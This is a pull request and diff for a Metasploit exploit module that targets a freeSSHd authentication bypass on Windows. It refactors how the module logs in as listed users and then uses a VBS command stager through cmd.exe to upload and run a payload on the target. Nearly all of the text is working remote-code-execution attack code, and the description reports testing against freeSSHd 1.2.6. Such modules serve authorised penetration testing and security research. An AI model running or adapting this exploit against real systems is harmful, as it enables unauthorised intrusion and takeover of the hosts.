### PR TITLE
Update freesshd_authbypass to use CmdStager fully

### DIFF
--- a/modules/exploits/windows/ssh/freesshd_authbypass.rb
+++ b/modules/exploits/windows/ssh/freesshd_authbypass.rb
@@ -9,7 +9,6 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::Tcp
-  include Msf::Exploit::EXE
   include Msf::Exploit::CmdStager
 
   def initialize(info={})
@@ -81,24 +80,8 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
 
-  def upload_payload(connection)
-    exe = generate_payload_exe
-    filename = rand_text_alpha(8) + ".exe"
-    cmdstager = Rex::Exploitation::CmdStagerVBS.new(exe)
-    opts = {
-      :linemax => 1700,
-      :decoder => default_decoder(:vbs)
-    }
-
-    cmds = cmdstager.generate(opts)
-
-    if (cmds.nil? or cmds.length < 1)
-      print_error("The command stager could not be generated")
-      raise ArgumentError
-    end
-    cmds.each { |cmd|
-      connection.exec!("cmd.exe /c "+cmd)
-    }
+  def execute_command(cmd, opts = {})
+    @connection.exec!("cmd.exe /c "+cmd)
   end
 
   def setup_ssh_options
@@ -168,18 +151,17 @@ class MetasploitModule < Msf::Exploit::Remote
 
     options = setup_ssh_options
 
-    connection = nil
+    @connection = nil
 
     each_user do |username|
       next if username.empty?
-      connection=do_login(username,options)
-      break if connection
+      @connection=do_login(username,options)
+      break if @connection
     end
 
-    if connection
+    if @connection
       print_status("Uploading payload, this may take several minutes...")
-      upload_payload(connection)
-      handler
+      execute_cmdstager(flavor: :vbs, decoder: default_decoder(:vbs), linemax: 1700)
     end
   end
 


### PR DESCRIPTION
Tested against freeSSHd 1.2.6 running in Wine. :D

I am currently fixing the decoder selection to (more truthfully) take a symbol and not only a path. At some point, we might want to refactor the code to use the SSH mixin, too.

Thanks!!

#8095